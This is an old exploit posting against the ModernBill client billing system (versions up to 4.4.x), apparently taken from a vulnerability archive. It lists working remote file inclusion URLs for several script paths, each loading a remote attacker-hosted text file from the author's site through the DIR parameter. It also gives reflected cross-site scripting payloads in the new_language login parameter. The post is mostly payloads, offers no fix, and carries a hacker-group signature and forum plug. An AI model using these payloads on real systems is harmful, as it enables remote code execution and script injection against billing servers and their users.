ModernBill <= 4.4.x XSS - Remote File Inclusion Vulnerability

2008-10-31 05:01:06

**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************

rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?

xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&[email protected]&[email protected]&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&[email protected]&[email protected]&new_language="+onmouseover=alert(39660.2316362732)+

**************************************************************************************

#

Fixes

No fixes

In order to submit a new fix you need to be registered.